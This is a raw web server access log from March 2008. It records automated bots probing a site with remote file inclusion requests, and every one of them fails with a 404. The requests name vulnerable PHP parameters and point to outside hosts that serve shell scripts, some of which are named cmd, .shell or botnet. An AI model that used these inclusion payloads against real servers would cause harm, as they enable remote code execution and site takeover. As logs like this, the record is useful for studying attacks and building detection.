87.230.10.251 - - [04/Mar/2008:08:10:26 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:10:26 -0800] "GET /logs//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:10:27 -0800] "GET /logs/access_080216.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.168 - - [04/Mar/2008:08:10:27 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 33494 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:10:27 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:10:27 -0800] "GET /logs//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:10:48 -0800] "GET /logs/access_080216.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:10:48 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:08:10:48 -0800] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://camilovr.com/img/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:10:48 -0800] "GET /logs//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:08:10:48 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://camilovr.com/img/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:08:10:49 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://camilovr.com/img/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:08:10:51 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:08:10:58 -0800] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://camilovr.com/img/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:08:10:58 -0800] "GET /convert/mvcw.php?vwar_root=http://camilovr.com/img/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:08:10:58 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://camilovr.com/img/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [04/Mar/2008:08:11:03 -0800] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [04/Mar/2008:08:11:03 -0800] "GET /convert/mvcw.php?vwar_root=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [04/Mar/2008:08:11:03 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:11:04 -0800] "GET /logs/access_080119.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:08:11:05 -0800] "GET /logs/access_080211.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:08:11:05 -0800] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [04/Mar/2008:08:11:14 -0800] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [04/Mar/2008:08:11:14 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [04/Mar/2008:08:11:14 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:11:22 -0800] "GET /logs/access_080207.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:11:25 -0800] "GET /logs/access_080207.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:11:26 -0800] "GET /logs/access_080207.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:08:11:36 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:11:36 -0800] "GET /logs/access_071216.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:11:37 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:08:11:38 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:11:38 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:11:43 -0800] "GET /logs/access_080207.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:08:11:43 -0800] "GET /logs/access.log/index.php?mosConfig_absolute_path=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:08:11:43 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.11.254.36 - - [04/Mar/2008:08:11:44 -0800] "GET /logs/access_080131.log//log=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.11.254.36 - - [04/Mar/2008:08:11:44 -0800] "GET //log=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.11.254.36 - - [04/Mar/2008:08:11:44 -0800] "GET /logs//log=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:11:50 -0800] "GET /logs/access_071228.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.58.242.138 - - [04/Mar/2008:08:11:53 -0800] "GET /logs/access_080216.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [04/Mar/2008:08:11:54 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [04/Mar/2008:08:11:54 -0800] "GET /logs//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:08:12:15 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:08:12:15 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
217.11.254.36 - - [04/Mar/2008:08:12:24 -0800] "GET /logs/access.log//log=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.179.18 - - [04/Mar/2008:08:12:32 -0800] "GET //header.php?abspath=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.55.179.18 - - [04/Mar/2008:08:12:32 -0800] "GET /logs//header.php?abspath=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.127.86.119 - - [04/Mar/2008:08:12:47 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:12:48 -0800] "GET /logs/access_071224.log//index.php?pageurl=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.58.242.138 - - [04/Mar/2008:08:13:09 -0800] "GET /logs/access_080207.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:08:13:15 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:08:13:16 -0800] "GET /logs/access_080201.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:08:13:17 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:13:20 -0800] "GET /logs/access_080127.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:08:13:47 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:08:13:58 -0800] "GET /logs/access_080211.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:14:07 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.107.242 - - [04/Mar/2008:08:14:15 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:08:14:18 -0800] "GET /logs/access_080108.log/convert/mvcw.php?step=1&vwar_root=http://camilovr.com/img/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:08:14:19 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://camilovr.com/img/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [04/Mar/2008:08:14:20 -0800] "GET /logs/access_080108.log/convert/mvcw.php?step=1&vwar_root=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.11.254.36 - - [04/Mar/2008:08:14:30 -0800] "GET /logs/access_080131.log//pagina=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.11.254.36 - - [04/Mar/2008:08:14:30 -0800] "GET //pagina=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.11.254.36 - - [04/Mar/2008:08:14:30 -0800] "GET /logs//pagina=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.196.84 - - [04/Mar/2008:08:15:02 -0800] "GET /main.php?pageURL=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:15:03 -0800] "GET /logs/access_080122.log//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:15:37 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:15:38 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:15:38 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.38.160.137 - - [04/Mar/2008:08:15:39 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.125.20.108 - - [04/Mar/2008:08:15:40 -0800] "GET /logs/access_080216.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.125.20.108 - - [04/Mar/2008:08:15:40 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.125.20.108 - - [04/Mar/2008:08:15:40 -0800] "GET /logs//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.38.160.137 - - [04/Mar/2008:08:15:40 -0800] "GET //skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.86.119 - - [04/Mar/2008:08:15:41 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.38.160.137 - - [04/Mar/2008:08:15:42 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:08:15:54 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:08:15:54 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:08:15:55 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:08:16:11 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:16:13 -0800] "GET /logs/access_080106.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:08:16:31 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:08:16:31 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
85.17.1.143 - - [04/Mar/2008:08:16:32 -0800] "GET /errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.17.1.143 - - [04/Mar/2008:08:16:33 -0800] "GET /logs/errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
81.19.151.78 - - [04/Mar/2008:08:16:34 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.19.151.78 - - [04/Mar/2008:08:16:34 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.19.151.78 - - [04/Mar/2008:08:16:35 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.41.19 - - [04/Mar/2008:08:16:42 -0800] "GET /stringhttp://yallaserver.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
208.116.41.19 - - [04/Mar/2008:08:16:42 -0800] "GET /logs/stringhttp://yallaserver.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
86.38.160.137 - - [04/Mar/2008:08:16:53 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:08:16:56 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:08:16:57 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:08:16:58 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.38.160.137 - - [04/Mar/2008:08:16:59 -0800] "GET //skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.33.49.76 - - [04/Mar/2008:08:17:00 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.econfusion.de/frrresh_de/content/img/cmd7.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.33.49.76 - - [04/Mar/2008:08:17:00 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.econfusion.de/frrresh_de/content/img/cmd7.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:17:00 -0800] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.38.160.137 - - [04/Mar/2008:08:17:01 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:08:17:01 -0800] "GET /logs/access_080201.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:17:20 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:17:20 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:08:17:20 -0800] "GET /logs/access_080216.log//homepage.php?sel=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:17:20 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:08:17:20 -0800] "GET //homepage.php?sel=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:08:17:22 -0800] "GET /logs//homepage.php?sel=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.69.144.194 - - [04/Mar/2008:08:17:33 -0800] "GET /logs/access_080131.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:17:45 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:17:45 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.125.20.108 - - [04/Mar/2008:08:17:58 -0800] "GET /logs/access_080207.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.33.49.76 - - [04/Mar/2008:08:18:08 -0800] "GET /contenido/external/frontend/news.php?cfg[path][includes]=http://www.econfusion.de/frrresh_de/content/img/cmd7.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.33.49.76 - - [04/Mar/2008:08:18:12 -0800] "GET /logs/contenido/external/frontend/news.php?cfg[path][includes]=http://www.econfusion.de/frrresh_de/content/img/cmd7.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:08:18:35 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:08:18:35 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:08:18:36 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
